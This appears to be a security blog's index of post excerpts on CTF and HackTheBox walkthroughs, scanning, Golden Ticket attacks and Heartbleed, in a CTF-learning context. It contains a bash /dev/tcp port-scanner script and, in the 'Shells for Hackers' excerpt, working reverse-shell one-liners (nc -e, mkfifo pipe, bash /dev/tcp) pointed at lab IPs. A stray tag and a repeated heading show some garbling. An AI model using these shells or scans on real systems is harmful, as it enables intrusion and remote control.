LOTL Port Scanning

Living Off The Land (LOTL) techniques leverage native tools already present in the target environment to accomplish tasks such as information gathering, persistence, and execution. Because these tools are expected on the host and are usually trusted and permitted to run, attackers who use them often avoid detection. One fundamental technique used in […]

SSH Key Exploitation and SMB Recon: A CTF

CTFs (Capture The Flag competitions) offer hands-on experience, simulating real-world cyber scenarios. They hone skills, encourage problem-solving, foster teamwork, and promote a deep understanding of cyber threats and defense strategies. Insights: SSH key usage: stored SSH keys can be exploited to gain access, especially if they aren’t password-protected or if the passphrase can be […]

Threat Modeling: STRIDE and DFD

In the dynamic landscape of cybersecurity, establishing a clear understanding of threats is paramount. While introductory courses may gloss over various methodologies, diving deep into advanced techniques such as STRIDE and Data Flow Diagrams (DFD) is essential for established professionals. This article provides an in-depth examination of these advanced threat modeling methodologies. The Significance of […]

Working with Linux Capabilities | Cap HackTheBox

Linux capabilities allow for a nuanced approach to the security architecture, breaking down the absolute root privilege into specific individual permissions. This division provides a detailed control mechanism as opposed to the generic superuser model. “Cap” is a HackTheBox machine designed to test one’s grasp of pcap files and SSH, but also emphasizes the importance […]

Scanning for the CTF Arena

This is a reference guide offering concise command suggestions for machine scanning. It covers widely-used tools and also provides “living off the land” alternatives built from native commands, so it stays usable in environments where scanning tools cannot be installed. Host discovery with nmap: a basic ping sweep (nmap -sn 10.10.10.0/24), or, if ICMP is blocked, a port-based sweep that skips host discovery (nmap -Pn -p 80,443 10.10.10.0/24). ARP scan with […]
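The LOTL port-scanning and scanning-guide excerpts above both describe doing reconnaissance with whatever the host already provides. The following is an added example, not code from either linked article, of a TCP connect scanner that needs only bash’s /dev/tcp pseudo-device and the coreutils/busybox timeout command, so it works on a foothold where nmap and nc are absent. The target address and port list in the usage line are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: a living-off-the-land TCP connect scanner using only the bash
# /dev/tcp pseudo-device and the `timeout` command; no nmap or nc required.
# Target host and port list below are constructed for illustration.

# probe_port HOST PORT [TIMEOUT]: prints "open" or "closed"; returns 0 if open.
probe_port() {
    host=$1; port=$2; wait=${3:-1}
    # Redirecting to /dev/tcp/HOST/PORT makes bash open a TCP connection.
    # A refused port fails immediately; a filtered (silently dropped) port
    # would hang until the kernel gives up on SYN retransmits, so `timeout`
    # bounds the wait. Output is discarded; only success/failure matters.
    if timeout "$wait" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null; then
        echo open
        return 0
    fi
    echo closed
    return 1
}

# scan_ports HOST PORT...: prints, one per line, the ports that accepted a
# connection. A connect scan completes the handshake, so it is noisier than a
# SYN scan but requires no raw sockets and therefore no root.
scan_ports() {
    host=$1; shift
    for p in "$@"; do
        if probe_port "$host" "$p" >/dev/null; then
            printf '%s\n' "$p"
        fi
    done
}

# Usage against a constructed target (uncomment to run on a live engagement):
# scan_ports 10.10.10.5 21 22 80 443 445 3389 8080
```

Each connect attempt completes a full TCP handshake, so the target’s service logs will record it; that is the trade-off for needing nothing but the shell. Loopback port 1 is used below only as a port that is reliably closed.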

Golden Ticket Attacks

Active Directory (AD) is ubiquitous in enterprise networks, acting as the keystone for authentication and access. As with any system, AD isn’t immune to abuse. A Golden Ticket attack forges Kerberos ticket-granting tickets using the key of the domain’s krbtgt account, giving the attacker access to any service in the domain until that key is rotated. This article provides a granular, hands-on guide to Golden Ticket attacks for Capture The Flag […]

Shells for Hackers

This cheat sheet is an essential guide, designed to aid in swiftly deploying shells across various computing environments. Use it as a go-to reference. Reverse shells. Netcat: start a listener with nc -nlvp 31337, then connect back with nc -e /bin/sh 10.10.10.10 31337, or, where nc lacks -e, with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 31337 >/tmp/f. Bash TCP: bash -i >& /dev/tcp/10.0.0.1/4242 0>&1, or 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh […]
</grreplace>
<gr_replace lines="29" cat="reformat" orig="Exploiting HeartBleed">
Exploiting Heartbleed for OSCP | Valentine HackTheBox

Exploiting HeartBleed for OSCP | Valentine HackTheBox

HackTheBox presents “Valentine”, a vulnerable machine centered around OpenSSL’s well-known Heartbleed bug, a memory over-read in the TLS heartbeat extension that leaks server memory to unauthenticated clients. This challenge pushes us to grapple with essential security concepts. The path to the flags involves decoding messages and navigating Linux for privilege escalation. In this walkthrough, I’ll share my approach to Valentine, highlighting the steps and strategies I used. Let’s dive into […]
